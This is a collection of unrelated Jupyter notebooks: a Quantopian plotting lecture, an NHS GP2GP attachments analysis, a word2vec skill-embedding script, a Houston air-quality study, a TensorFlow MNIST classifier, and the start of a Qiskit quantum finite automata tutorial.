``` %matplotlib inline import matplotlib.pyplot as plt plt.rcParams['font.sans-serif'] = ['SimHei'] plt.rcParams['axes.unicode_minus'] = False ``` # Graphical Representations of Data By Evgenia "Jenny" Nitishinskaya, Maxwell Margenot, and Delaney Granizo-Mackenzie. Part of the Quantopian Lecture Series: * [www.quantopian.com/lectures](https://www.quantopian.com/lectures) * [github.com/quantopian/research_public](https://github.com/quantopian/research_public) Notebook released under the Creative Commons Attribution 4.0 License. Representing data graphically can be incredibly useful for learning how the data behaves and seeing potential structure or flaws. Care should be taken, as humans are incredibly good at seeing only evidence that confirms our beliefs, and visual data lends itself well to that. Plots are good to use when formulating a hypothesis, but should not be used to test a hypothesis. We will go over some common plots here. ``` # Import our libraries # This is for numerical processing import numpy as np # This is the library most commonly used for plotting in Python. # Notice how we import it 'as' plt, this enables us to type plt # rather than the full string every time. import matplotlib.pyplot as plt ``` ## Getting Some Data If we're going to plot data we need some data to plot. We'll get the pricing data of Midea Group (000333) and Ping An Bank (000001) to use in our examples. ### Data Structure Knowing the structure of your data is very important. Normally you'll have to do a ton work molding your data into the form you need for testing. Quantopian has done a lot of cleaning on the data, but you still need to put it into the right shapes and formats for your purposes. In this case the data will be returned as a pandas dataframe object. The rows are timestamps, and the columns are the two assets, 000333 and 000001. 
``` from zipline.component.data import load_bars start = '2014-01-01' end = '2015-01-01' data = load_bars(['000001', '000333'], start=start, end=end) data.head() ``` Indexing into the data with `data['000333']` will yield an error because the columns are equity objects and not simple strings. Let's change that using this little piece of Python code. Don't worry about understanding it right now, unless you do, in which case congratulations. ``` data.head() ``` Much nicer, now we can index. Indexing into the 2D dataframe will give us a 1D series object. The index for the series is timestamps, the value upon index is a price. Similar to an array except instead of integer indices it's times. ``` data['000001'].head() ``` ## 柱状图(Histogram) A histogram is a visualization of how frequent different values of data are. By displaying a frequency distribution using bars, it lets us quickly see where most of the observations are clustered. The height of each bar represents the number of observations that lie in each interval. You can think of a histogram as an empirical and discrete Probability Density Function (PDF). ``` # Plot a histogram using 20 bins plt.hist(data['000001'], bins=20) plt.xlabel('Price') plt.ylabel('Number of Days Observed') plt.title('Frequency Distribution of 000001 Prices, 2014') ``` ### Returns Histogram In finance rarely will we look at the distribution of prices. The reason for this is that prices are non-stationary and move around a lot. For more info on non-stationarity please see [this lecture](https://www.quantopian.com/lectures/integration-cointegration-and-stationarity). Instead we will use daily returns. Let's try that now. 
``` # Remove the first element because percent change from nothing to something is NaN R = data['000001'].pct_change()[1:] # Plot a histogram using 20 bins plt.hist(R, bins=20) plt.xlabel('Return') plt.ylabel('观察日期数量') plt.title('Frequency Distribution of 000001 Returns, 2014'); ``` The graph above shows, for example, that the daily returns of 000001 were above 0.03 on fewer than 5 days in 2014. Note that we are completely discarding the dates corresponding to these returns. #####IMPORTANT: Note also that this does not imply that future returns will have the same distribution. ### Cumulative Histogram (Discrete Estimated CDF) An alternative way to display the data would be using a cumulative distribution function, in which the height of a bar represents the number of observations that lie in that bin or in one of the previous ones. This graph is always nondecreasing since you cannot have a negative number of observations. The choice of graph depends on the information you are interested in. ``` # Remove the first element because percent change from nothing to something is NaN R = data['000001'].pct_change()[1:] # Plot a histogram using 20 bins plt.hist(R, bins=20, cumulative=True) plt.xlabel('Return') plt.ylabel('Number of Days Observed') plt.title('Cumulative Distribution of 000001 Returns, 2014'); ``` ## Scatter plot A scatter plot is useful for visualizing the relationship between two data sets. We use two data sets which have some sort of correspondence, such as the date on which the measurement was taken. Each point represents two corresponding values from the two data sets. However, we don't plot the date that the measurements were taken on. 
``` plt.scatter(data['000001'], data['000333']) plt.xlabel('平安银行') plt.ylabel('美的集团') plt.title('Daily Prices in 2014'); R_000001 = data['000001'].pct_change()[1:] R_000333 = data['000333'].pct_change()[1:] plt.scatter(R_000001, R_000333) plt.xlabel('000001') plt.ylabel('000333') plt.title('Daily Returns in 2014') ``` # Line graph A line graph can be used when we want to track the development of the y value as the x value changes. For instance, when we are plotting the price of a stock, showing it as a line graph instead of just plotting the data points makes it easier to follow the price over time. This necessarily involves "connecting the dots" between the data points, which can mask out changes that happened between the time we took measurements. ``` plt.plot(data['000001']) plt.plot(data['000333']) plt.ylabel('Price') plt.legend(['000001', '000333']); # Remove the first element because percent change from nothing to something is NaN R = data['000001'].pct_change()[1:] plt.plot(R) plt.ylabel('Return') plt.title('000001 Returns') ``` ## Never Assume Conditions Hold Again, whenever using plots to visualize data, do not assume you can test a hypothesis by looking at a graph. Also do not assume that because a distribution or trend used to be true, it is still true. In general much more sophisticated and careful validation is required to test whether models hold, plots are mainly useful when initially deciding how your models should work. *This presentation is for informational purposes only and does not constitute an offer to sell, a solicitation to buy, or a recommendation for any security; nor does it constitute an offer to provide investment advisory or other services by Quantopian, Inc. ("Quantopian"). 
Nothing contained herein constitutes investment advice or offers any opinion with respect to the suitability of any security, and any views expressed herein should not be taken as advice to buy, sell, or hold any security or as an endorsement of any security or company. In preparing the information contained herein, Quantopian, Inc. has not taken into account the investment needs, objectives, and financial circumstances of any particular investor. Any views expressed and data illustrated herein were prepared based upon information, believed to be reliable, available to Quantopian, Inc. at the time of publication. Quantopian makes no guarantees as to their accuracy or completeness. All information is subject to change and may quickly become unreliable for various reasons, including changes in market conditions or economic circumstances.*
github_jupyter
# PRMT-2297: Look at attachments data from a supplier perspective ## Context We have performed some analysis on the attachments data set which suggests that nearly half of transfers contain no attachments. When we presented this in showcase we received feedback from clinical leads that they believe the number to be higher. It was suggested that one reason could be because some documents won't be included if, for example, they are EMIS and stored in Docman. ## Scope - Look at attachments data for 3 months - Identify the proportion of transfers per supplier that contain attachments - Identify the average no. attachments per transfer containing attachments, split by supplier - Look at attachments at a practice level for the following practices: - Clevedon Medical Centre - L81040 - Paxton Green Group Practice - G85039 - Vine Medical Centre - H81128 ``` import pandas as pd import numpy as np import datetime ``` #### Load Attachment Data ``` attachment_metadata_folder="s3://prm-gp2gp-data-sandbox-dev/" attachment_metadata_files = ["PRMT-2297-supplier-attachments/4-2021-attachment-metadata.csv.gz","PRMT-2297-supplier-attachments/5-2021-attachment-metadata.csv.gz","PRMT-2240-tpp-attachment-limit/6-2021-attachment-metadata.csv.gz"] attachments = pd.concat([pd.read_csv(attachment_metadata_folder+file, parse_dates=["_time"], na_values=["Unknown"], dtype={"Length": pd.Int64Dtype()}) for file in attachment_metadata_files]) relevant_attachments=attachments.loc[attachments['attachmentType']=='cid',['attachmentID','conversationID']].drop_duplicates() conversation_attachment_counts=relevant_attachments.groupby('conversationID').agg({'attachmentID':'count'}).rename({'attachmentID':'Number of Attachments'},axis=1) ``` #### Load Transfers ``` transfer_file_location = "s3://prm-gp2gp-data-sandbox-dev/transfers-sample-6/" transfer_files = [ "2021-4-transfers.parquet", "2021-5-transfers.parquet", "2021-6-transfers.parquet", ] transfer_input_files = [transfer_file_location + f for f in 
transfer_files] transfers = pd.concat(( pd.read_parquet(f) for f in transfer_input_files )) # Generate ASID lookup that contains all the most recent entry for all ASIDs encountered asid_file_location = "s3://prm-gp2gp-data-sandbox-dev/asid-lookup/asidLookup-Jun-2021.csv.gz" asid_lookup = pd.read_csv(asid_file_location) asid_lookup = asid_lookup.drop_duplicates().groupby("ASID").last().reset_index() lookup = asid_lookup[["ASID", "MName", "NACS","OrgName"]] transfers = transfers.merge(lookup, left_on='requesting_practice_asid',right_on='ASID',how='left') transfers = transfers.rename({'NACS': 'requesting_ods_code','OrgName':'requesting_practice_name'}, axis=1) transfers = transfers.merge(lookup, left_on='sending_practice_asid',right_on='ASID',how='left') transfers = transfers.rename({'NACS': 'sending_ods_code','OrgName':'sending_practice_name'}, axis=1) ``` #### Merge Data ``` full_transfers=transfers.merge(conversation_attachment_counts,left_on='conversation_id',right_index=True,how='left') full_transfers['Contains Attachments']=full_transfers['Number of Attachments']>0 full_transfers.shape[0] ``` ## What percentage of transfers contain attachments for each supplier Pathway? ``` supplier_table=full_transfers.groupby(['sending_supplier','requesting_supplier']).agg({'Contains Attachments':'mean','Number of Attachments':'mean'}) supplier_table=supplier_table.rename({'Contains Attachments':'% with Attachments','Number of Attachments':'Av attachments for transfers with attachments'},axis=1) supplier_table['% with Attachments']=supplier_table['% with Attachments'].multiply(100) supplier_table.fillna(0).round(1) ``` ## What % of transfers contain attachments for the practices in question? 
``` practices={'Clevedon Medical Centre':'L81040','Paxton Green Group Practice':'G85039','Vine Medical Centre':'H81128'} practice_counts=full_transfers.groupby(['sending_ods_code','sending_practice_name','sending_supplier','requesting_supplier']).agg({'Contains Attachments':['sum','mean'],'Number of Attachments':'mean'}) practice_counts.columns=['Number of Transfers','% of Transfers with Attachments','Av. Attachments for attachment transfers'] #practice_counts=practice_counts.loc[practices.values()] practice_counts['% of Transfers with Attachments']=practice_counts['% of Transfers with Attachments'].multiply(100) practice_counts.loc[practices.values()].fillna(0).round(1) ``` ## Is the use of Docman based on the individual practice? ``` practice_table=practice_counts.reset_index() supplier_filter=(practice_table['sending_supplier']=='EMIS') & (practice_table['requesting_supplier']=='SystmOne') count_filter=practice_table['Number of Transfers']>10 ax= practice_table.loc[supplier_filter & count_filter,'% of Transfers with Attachments'].plot.hist() ax.set_xlabel("% of EMIS to TPP Transfers with Attachments (min 10 Transfers)") ax.set_ylabel("Number of EMIS Practices") practice_table=practice_counts.reset_index() supplier_filter=(practice_table['sending_supplier']=='SystmOne') & (practice_table['requesting_supplier']=='EMIS') count_filter=practice_table['Number of Transfers']>10 ax=practice_table.loc[supplier_filter & count_filter,'% of Transfers with Attachments'].plot.hist() ax.set_xlabel("% of TPP to EMIS Transfers with Attachments (min 10 Transfers)") ax.set_ylabel("Number of TPP Practices") ```
github_jupyter
``` import pandas as pd import numpy as np import cPickle from nltk.corpus import stopwords from gensim.models import word2vec import nltk.data import re import logging with open("prep_data_tokens_underscore_1", "rb") as g: data_dice = cPickle.load(g) print len(data_dice) data_dice[0] data_must_have = pd.read_csv('mustHaveSkills-2.csv', header = 0, encoding='ISO-8859-1') del data_must_have['job_brief_id'] print len(data_must_have) data_must_have = data_must_have.drop_duplicates(subset=['keyword_name', 'job_title'], keep='last') data_must_have = data_must_have[data_must_have["job_title"] != 0] print len(data_must_have) data_must_have['Count'] = data_must_have.groupby('job_title')['keyword_name'].transform(pd.Series.value_counts) data_must_have.drop_duplicates(inplace=True) data_must_have['keyword_name'] = data_must_have['keyword_name'].str.lower() data_must_have['keyword_name'] = data_must_have['keyword_name'].str.replace(' ' ,'_') data_must_have['job_title'] = data_must_have['job_title'].str.lower() # gr_df_keywordname = data_must_have.groupby('keyword_name')['job_title'].apply(list) gr_df_jobtitle = data_must_have.groupby('job_title')['keyword_name'].apply(list) gr_df_jobtitle must_have_data = [] for vector_list in gr_df_jobtitle: xx = list(set(vector_list)) if xx not in must_have_data: must_have_data.append(xx) len(must_have_data) must_have_data[0:2] data_naruki = pd.read_csv('naukri_skill_full', header = 0, encoding='ISO-8859-1') # drop duplicate data_naruki.drop_duplicates(subset=['id', 'skill'], keep='last') # lower-case data_naruki['skill'] = data_naruki['skill'].str.lower() data_naruki['skill'] = data_naruki['skill'].str.replace(' ','_') data_naruki_final = data_naruki.groupby('id')['skill'].apply(list) print len(data_naruki_final) data_naruki_final[:10] data_train_w2v = data_dice for must_have in gr_df_jobtitle: if len(must_have) > 2: if must_have not in data_train_w2v: data_train_w2v.append(must_have) len(data_train_w2v) for skills in data_naruki_final: if 
len(skills) > 2 and skills not in data_train_w2v: data_train_w2v.append(skills) len(data_train_w2v) with open('./duyet_data_train_w2v', 'wb') as f: cPickle.dump(data_train_w2v_for_check, f) with open('./duyet_data_train_w2v', 'rd') as f: data_train_w2v = cPickle.load(f) len(data_train_w2v) data_train_w2v_for_check = data_train_w2v data_train_w2v = [] for i in data_train_w2v_for_check: vector =[] for j in i: # TODO: remove stopword, clean if isinstance(j, unicode): if 1 == 1: # or j not in vector: vector.append(j) if i not in data_train_w2v: data_train_w2v.append(vector) print len(data_train_w2v) import multiprocessing logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO) print ("Training model...") model = word2vec.Word2Vec(data_train_w2v, workers=multiprocessing.cpu_count(), # Number of threads to run in parallel size=300, min_count=1, window=10, sample = 1e-3, # Downsample setting for frequent words iter=4, sg =1 ) model.init_sims(replace=True) model.wv.save_word2vec_format('duyet_word2vec_skill.bin', binary=True) ``` # Testing ``` model.similar_by_word('machine_learning') model.similar_by_word('python') model.similar_by_word('css') model.similar_by_word('html') model.similar_by_word('html5') model.similar_by_word('bootstrap') model.similar_by_word('javascript') model.similar_by_word('nodejs') model.similar_by_word('node.js') model.similar_by_word('php') model.similar_by_word('c++') model.similar_by_word('web') model.similar_by_word('rails') model.similar_by_word('ruby') model.similar_by_word('mysql') model.similar_by_word('db2') model.similar_by_word('sql') model.similar_by_word('mssql') model.similar_by_word('db2') model.similar_by_word('html5') model.similar_by_word('oracle') model.similar_by_word('php5') model.similar_by_word('asp') model.similar_by_word('svm') model.similar_by_word('django') model.similar_by_word('mongodb') model.similar_by_word('mongo') model.similar_by_word('falcon') model.similar_by_word('express') 
model.similar_by_word('spark') model.similar_by_word('hadoop') model.similar_by_word('hive') model.similar_by_word('impala') model.similar_by_word('oozie') model.similar_by_word('nginx') model.similar_by_word('rest') model.similar_by_word('.net') model.similar_by_word('perl') model.similar_by_word('unity') model.similar_by_word('3d') model.similar_by_word('wordpress') model.similar_by_word('jquery') model.similar_by_word('ajax') ```
github_jupyter
``` import pandas as pd import datetime import matplotlib.pyplot as plt all_o3_df = pd.read_csv("./Resources/all_years_o3.csv") #turn date column elements into datetime objects all_o3_df["Date"] = pd.to_datetime(all_o3_df["Date"]) all_o3_df = all_o3_df.set_index("Date") all_pm25_df = pd.read_csv("./Resources/all_years_pm25.csv") #turn date column elements into datetime objects all_pm25_df["Date"] = pd.to_datetime(all_pm25_df["Date"]) all_pm25_df = all_pm25_df.set_index("Date") all_pm25_df.head() #select date range to measure PM2.5 for full shutdown - include all years #messy right now - turn into a function! #use Wuhan as an example earliest_year = min(all_pm25_df.index.year) latest_year = max(all_pm25_df.index.year) shutdown_start_date = (3, 19)#"1/23" shutdown_end_date = (4, 16)#"4/8" mask = ((pd.Series(map(lambda x: x.month <= shutdown_start_date[0], all_pm25_df.index.date), index=all_pm25_df.index)) & ((pd.Series(map(lambda x: x.day < shutdown_start_date[1], all_pm25_df.index.date), index=all_pm25_df.index)))) #first get dates after the start date for all years shutdown_time_period_pm_df = all_pm25_df.loc[~mask, :] #remove the later months shutdown_time_period_pm_df = shutdown_time_period_pm_df.loc[shutdown_time_period_pm_df.index.month<=shutdown_end_date[0]] #now get dates before the end date mask2 = ((pd.Series(map(lambda x: x.month == shutdown_end_date[0], shutdown_time_period_pm_df.index.date), index=shutdown_time_period_pm_df.index)) & ((pd.Series(map(lambda x: x.day >= shutdown_end_date[1], shutdown_time_period_pm_df.index.date), index=shutdown_time_period_pm_df.index)))) shutdown_time_period_pm_df = shutdown_time_period_pm_df.loc[~mask2, :] shutdown_time_period_pm_df = shutdown_time_period_pm_df.loc[shutdown_time_period_pm_df["City"] == "Houston"] print(shutdown_time_period_pm_df.head()) shutdown_time_period_pm_df.tail(10) #inputs for the function are the complete dataframe for one particulate (df), the city name (city), an integer tuple in the #form of 
(month, day) for the shutdown date (shutdown_date, for example (1, 23) for 1/23) - NOTE that this is the #date where the strictest lockdown regulations start for that city, and an integer tuple in the #form of (month, day) for the reopen date (reopen_date, for example (4, 8) for 4/8) - NOTE that this is the date when the city #begins to reopen from the strictest lockdown regulations # #returns a dataframe with the correct shutdown date ranges for all years in the data set def shutdownData(df, city, shutdown_date, reopen_date): mask = ((pd.Series(map(lambda x: x.month <= shutdown_date[0], df.index.date), index=df.index)) & ((pd.Series(map(lambda x: x.day < shutdown_date[1], df.index.date), index=df.index)))) #first get dates after the start date for all years shutdown_time_period_df = df.loc[~mask, :] #remove the later months shutdown_time_period_df = shutdown_time_period_df.loc[shutdown_time_period_df.index.month<=reopen_date[0]] #now get dates before the end date mask2 = ((pd.Series(map(lambda x: x.month == reopen_date[0], shutdown_time_period_df.index.date), index=shutdown_time_period_df.index)) & ((pd.Series(map(lambda x: x.day >= reopen_date[1], shutdown_time_period_df.index.date), index=shutdown_time_period_df.index)))) shutdown_time_period_df = shutdown_time_period_df.loc[~mask2, :] shutdown_time_period_df = shutdown_time_period_df.loc[shutdown_time_period_df["City"] == city] return shutdown_time_period_df test_df = shutdownData(all_pm25_df, "Houston", (3, 19), (4, 16)) print("The 'shutdownData' function is working correctly:", test_df.equals(shutdown_time_period_pm_df)) #so to get the ozone information for Wuhan between the shutdown date of 1/23 and the reopening date of 4/8, we #need to call the function as follows: houston_o3_shutdown_df = shutdownData(all_o3_df, "Houston", (3, 19), (4, 16)) houston_o3_shutdown_df #get average of medians by year bar_plot_info = shutdown_time_period_pm_df.groupby(shutdown_time_period_pm_df.index.year).mean() bar_plot_info 
#plot of average medians bar_plot_info.plot(kind="bar", y="median (ug/m3)", legend=None) plt.ylabel("Median PM2.5 ub/m3") plt.title("Houston Air Quality - PM2.5 Average Median") plt.savefig("./outputs/Houston/houston_pm25median.png") #plot of average maximums bar_plot_info.plot(kind="bar", y="max (ug/m3)", legend=None) plt.ylabel("Max PM2.5 ub/m3") plt.title("Houston Air Quality - Average Max PM2.5") plt.savefig("./outputs/Houston/houston_pm25max.png") #get percentage decrease year over year bar_plot_info.pct_change() #combine three previous years into an average median value prior_years_df = bar_plot_info.loc[bar_plot_info.index<2020] prior_averages = prior_years_df.mean() prior_averages summary_bar_plot = pd.DataFrame({"average median during shutdown dates (ug/m3)":[prior_averages["median (ug/m3)"], bar_plot_info["median (ug/m3)"][2020]]}, index=["Prior Years", "2020"]) summary_bar_plot.plot(kind="bar", legend=None) summary_bar_plot.pct_change() plt.ylabel("Avg Median PM2.5 ub/m3") plt.title("Houston Air Quality - Average Median PM2.5") plt.savefig("./outputs/Houston/houston_3yearMedianchange.png") summary_bar_plot.pct_change() line_plot, line_axes = plt.subplots() HO_2020_pm25_df = all_pm25_df.loc[(all_pm25_df.index.year == 2020) & (all_pm25_df["City"] == "Houston")] HO_line_axes = HO_2020_pm25_df.plot(kind="line", y="median (ug/m3)", legend=None, ax=line_axes) #set titles, axes labels HO_line_axes.set_title("Houston Air Quality 2020 - PM2.5") HO_line_axes.set_ylabel("PM2.5 Average Median (ug/m3)") HO_line_axes.set_xlabel("Month") HO_line_axes.get_figure().savefig("./outputs/Houston/HO_2020_line_plot.png") HO_2020_shutdown = HO_2020_pm25_df["3/19/20":"4/16/20"] shutdown_axes = HO_2020_shutdown.plot(y="median (ug/m3)", style="r", ax=line_axes) shutdown_axes.legend(["median (ug/m3)", "median (ug/m3) during shutdown"]) plt.savefig("./outputs/Houston/houston_2020pm25_line.png") line_plot #o3 #get average of medians by year bar_plot_info = 
houston_o3_shutdown_df.groupby(houston_o3_shutdown_df.index.year).mean() bar_plot_info #plot of average medians bar_plot_info.plot(kind="bar", y="median (ppb)", legend=None) plt.ylabel("Median O3") plt.title("Houston Air Quality - O3 Average Median") plt.savefig("./outputs/Houston/houston_o3median.png") #plot of average maximums bar_plot_info.plot(kind="bar", y="max (ppb)", legend=None) plt.ylabel("Max O3 ppb") plt.title("Houston Air Quality - Average Max O3") plt.savefig("./outputs/Houston/houston_o3max.png") #get percentage decrease year over year bar_plot_info.pct_change() #combine three previous years into an average median value prior_years_df = bar_plot_info.loc[bar_plot_info.index<2020] prior_averages = prior_years_df.mean() prior_averages summary_bar_plot = pd.DataFrame({"average median during shutdown dates (ppb)":[prior_averages["median (ppb)"], bar_plot_info["median (ppb)"][2020]]}, index=["Prior Years", "2020"]) summary_bar_plot.plot(kind="bar", legend=None) plt.ylabel("Avg Median O3 (ppb)") plt.title("Houston Air Quality - Average Median O3") plt.savefig("./outputs/Houston/houstono3_3yearMedianchange.png") summary_bar_plot.pct_change() ```
github_jupyter
## DR = (Digit Recognizer) - https://www.kaggle.com/c/digit-recognizer ``` import pandas as pd import numpy as np import seaborn as sns import matplotlib.pyplot as plt import matplotlib.cm as cm import tensorflow as tf import time train = pd.read_csv("./input/train.csv") test = pd.read_csv("./input/test.csv") train.describe() train.shape train.head() learning_rate = 0.0001 total_train = 2500 drop_out = 0.7 batch_size = 50 VALIDATION_SIZE = 2000 IMAGE_TO_DISPLAY = 10 ``` ## 784 = 28 x 28 ``` images = train.iloc[:,1:].values images = images.astype(np.float) print(images) images = np.multiply(images, 1.0 / 255.0) print(len(images)) print('images({0[0]},{0[1]})'.format(images.shape)) ``` - image에서 1번 성분 추출 ``` image_size = images.shape[1] print(image_size) ``` - ceil 반올림 개념 ``` image_width = image_height = np.ceil(np.sqrt(image_size)).astype(np.uint8) print ('image_width => {0}\nimage_height => {1}'.format(image_width,image_height)) image_01 = images[400].reshape(image_width,image_height) plt.axis('off') plt.imshow(image_01, cmap = cm.binary) plt.show() # display image def display(img): # (784) => (28,28) one_image = img.reshape(image_width,image_height) plt.axis('off') plt.imshow(one_image, cmap=cm.binary_r) plt.show() # output image display(images[IMAGE_TO_DISPLAY]) labels_flat = train[[0]].values.ravel() print(labels_flat) print('labels_flat({0})'.format(len(labels_flat))) print ('labels_flat[{0}] => {1}'.format(IMAGE_TO_DISPLAY,labels_flat[IMAGE_TO_DISPLAY])) labels_count = np.unique(labels_flat).shape[0] print('labels_count => {0}'.format(labels_count)) def dense_to_one_hot(labels_dense, num_classes): num_labels = labels_dense.shape[0] index_offset = np.arange(num_labels) * num_classes labels_one_hot = np.zeros((num_labels, num_classes)) labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1 return labels_one_hot labels = dense_to_one_hot(labels_flat, labels_count) labels = labels.astype(np.uint8) print('labels({0[0]},{0[1]})'.format(labels.shape)) print 
('labels[{0}] => {1}'.format(IMAGE_TO_DISPLAY,labels[IMAGE_TO_DISPLAY])) ``` ## Data process for tensorflow ``` validation_images = images[:VALIDATION_SIZE] validation_labels = labels[:VALIDATION_SIZE] train_images = images[VALIDATION_SIZE:] train_labels = labels[VALIDATION_SIZE:] print('train_images({0[0]},{0[1]})'.format(train_images.shape)) print('validation_images({0[0]},{0[1]})'.format(validation_images.shape)) ``` # Model ``` #images X = tf.placeholder(tf.float32, shape=[None, image_size]) #labels Y = tf.placeholder(tf.float32, shape=[None, labels_count]) weight_01 = tf.Variable(tf.truncated_normal([5,5,1,32],stddev=0.1)) bias_01 = tf.Variable(tf.constant(0.1,shape=[32])) print(weight_01) print(bias_01) ``` - The convolution computes 32 features for each 5x5 patch. Its weight tensor has a shape of [5, 5, 1, 32]. - tf.reshpte[-1(None), 넓이, 높이, 밀도] ``` image = tf.reshape(X, [-1, image_width, image_height,1]) print(image.get_shape()) con2d_01 = tf.nn.conv2d(image, weight_01, strides=[1,1,1,1], padding='SAME') print(con2d_01.shape) con2d_01 = con2d_01 + bias_01 print(con2d_01.shape) con2d_01 = tf.nn.relu(con2d_01) print(con2d_01.shape) con2d_01_mp = tf.nn.max_pool(con2d_01, ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME') print(con2d_01_mp.get_shape()) layer_01 = tf.reshape(con2d_01, (-1, image_height, image_width, 4, 8)) print(layer_01.shape) layer_01 = tf.transpose(layer_01, (0, 3, 1, 4,2)) print(layer_01.shape) layer_01 = tf.reshape(layer_01, (-1, image_height * 4, image_width * 8)) print(layer_01.shape) weight_02 = tf.Variable(tf.truncated_normal([5,5,32,64],stddev=0.1)) bias_02 = tf.Variable(tf.constant(0.1,shape=[64])) print(weight_02) print(bias_02) con2d_02 = tf.nn.conv2d(con2d_01_mp, weight_02, strides=[1,1,1,1], padding='SAME') print(con2d_02.shape) con2d_02 = con2d_02 + bias_02 print(con2d_02.shape) con2d_02 = tf.nn.relu(con2d_02) print(con2d_02.shape) con2d_02_mp = tf.nn.max_pool(con2d_02, ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME') 
print(con2d_02_mp.get_shape()) layer_02 = tf.reshape(con2d_02, (-1, 14, 14, 4 ,16)) print(layer_02.shape) layer_02 = tf.transpose(layer_02, (0, 3, 1, 4,2)) print(layer_02.shape) layer_02 = tf.reshape(layer_02, (-1, 14*4, 14*16)) print(layer_02.shape) weight_03 = tf.Variable(tf.truncated_normal([7*7*64, 1024],stddev=0.1)) bias_03 = tf.Variable(tf.constant(0.1,shape=[1024])) print(weight_03) print(weight_03.shape) print(bias_03) print(bias_03.shape) con2d_02_mp_flat = tf.reshape(con2d_02_mp, [-1, 7*7*64]) print(con2d_02_mp_flat.shape) hypothesis = tf.nn.relu(tf.matmul(con2d_02_mp_flat, weight_03) + bias_03) print(hypothesis) print(hypothesis.shape) keep_prob = tf.placeholder(tf.float32) hypothesis_do = tf.nn.dropout(hypothesis, keep_prob=keep_prob) # labels_count = 10 weight_04 = tf.Variable(tf.truncated_normal([1024, labels_count],stddev=0.1)) bias_04 = tf.Variable(tf.constant(0.1,shape=[labels_count])) print(weight_04) print(weight_04.shape) print(bias_04) print(bias_04.shape) output = tf.nn.softmax(tf.matmul(hypothesis_do, weight_04) + bias_04) print(output.shape) cost = - tf.reduce_sum(Y * tf.log(output)) optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost) ``` # 정확도 ``` prediction = tf.equal(tf.argmax(Y,1), tf.argmax(output,1)) accuracy = tf.reduce_mean(tf.cast(prediction, tf.float32)) predict = tf.argmax(Y,1) ``` ## Training ``` epochs_completed = 0 index_in_epoch = 0 num_examples = train_images.shape[0] def next_batch(batch_size): global train_images global train_labels global index_in_epoch global epochs_completed start = index_in_epoch index_in_epoch += batch_size # when all trainig data have been already used, it is reorder randomly if index_in_epoch > num_examples: # finished epoch epochs_completed += 1 # shuffle the data perm = np.arange(num_examples) np.random.shuffle(perm) train_images = train_images[perm] train_labels = train_labels[perm] # start next epoch start = 0 index_in_epoch = batch_size assert batch_size <= 
num_examples end = index_in_epoch return train_images[start:end], train_labels[start:end] init = tf.global_variables_initializer() sess = tf.InteractiveSession() sess.run(init) train_accuracies = [] validation_accuracies = [] x_range = [] display_step=1 """ learning_rate = 0.0001 total_train = 2500 drop_out = 0.7 batch_size = 50 VALIDATION_SIZE = 2000 IMAGE_TO_DISPLAY = 10 """ start_time = time.time() for i in range(total_train): batch_xs, batch_ys = next_batch(batch_size) if i%display_step == 0 or (i+1) == total_train: train_accuracy = accuracy.eval(feed_dict={X:batch_xs, Y: batch_ys, keep_prob: 1.0}) if(VALIDATION_SIZE): validation_accuracy = accuracy.eval(feed_dict={ X: validation_images[0:batch_size], Y: validation_labels[0:batch_size], keep_prob: 1.0}) print('training_accuracy / validation_accuracy => %.2f / %.2f for step %d'%(train_accuracy, validation_accuracy, i)) validation_accuracies.append(validation_accuracy) else: print('training_accuracy => %.4f for step %d'%(train_accuracy, i)) train_accuracies.append(train_accuracy) x_range.append(i) if i%(display_step*10) == 0 and i: display_step *= 10 sess.run(optimizer, feed_dict={X: batch_xs, Y: batch_ys, keep_prob: drop_out}) estimated_time = time.time() - start_time print(estimated_time, "[second]") if(VALIDATION_SIZE): validation_accuracy = accuracy.eval(feed_dict={X: validation_images, Y: validation_labels, keep_prob: 1.0}) print('validation_accuracy => %.4f'%validation_accuracy) plt.plot(x_range, train_accuracies,'-b', label='Training') plt.plot(x_range, validation_accuracies,'-g', label='Validation') plt.legend(loc='lower right', frameon=False) plt.ylim(ymax = 1.1, ymin = 0.7) plt.ylabel('accuracy') plt.xlabel('step') plt.show() ``` # Result - accuracy = 98.5% - estimated time = 25.9[s] # Train에 대한 Test ``` test = test.astype(np.float) ``` - 0~255까지의 수를 0과 1 사이의 값으로 normalize ``` test = np.multiply(test, 1.0/255.0) print(test.shape) prediction_lables = np.zeros(test.shape[0]) print(prediction_lables) 
layer1_grid = layer_01.eval(feed_dict={X: test[7:7+1], keep_prob: 1.0}) plt.axis('off') plt.imshow(layer1_grid[0], cmap=cm.seismic ) plt.show() sess.close() ```
github_jupyter
<img src="../../../images/qiskit-heading.png" alt="Note: In order for images to show up in this jupyter notebook you need to select File => Trusted Notebook" width="500 px" align="left"> ## _*Comparing Classical and Quantum Finite Automata (QFA)*_ Finite Automaton has been a mathematical model for computation since its invention in the 1940s. The purpose of a Finite State Machine is to recognize patterns within an input taken from some character set and accept or reject the input based on whether the pattern defined by the machine occurs in the input. The machine requires a list of states, the initial state, and the conditions for each transition from state to state. Such classical examples are vending machines, coin-operated turnstiles, elevators, traffic lights, etc. In the classical algorithm, the sequence begins in the start state, and will only make a transition if the next character in the input string matches the label on the transition from the current to the next state. The machine will continue making transitions on each input character until no move is possible. The string will be accepted if its final state is in the accept state and will be rejected if its final state is anywhere else. As for Quantum Finite Automata (QFA), the machine works by accepting a finite-length string of letters from a finite alphabet and utilizing quantum properties such as superposition to assign the string a probability of being in either the accept or reject state. *** ### Contributors Kaitlin Gili, Rudy Raymond ## Prime Divisibility Algorithm Let's say that we have a string with $ a^i $ letters and we want to know whether the string is in the language $ L $ where $ L $ = {$ a^i $ | $ i $ is divisble by $ p $} and $ p $ is a prime number. If $ i $ is divisible by $ p $, we want to accept the string into the language, and if not, we want to reject it. $|0\rangle $ and $ |1\rangle $ serve as our accept and reject states. 
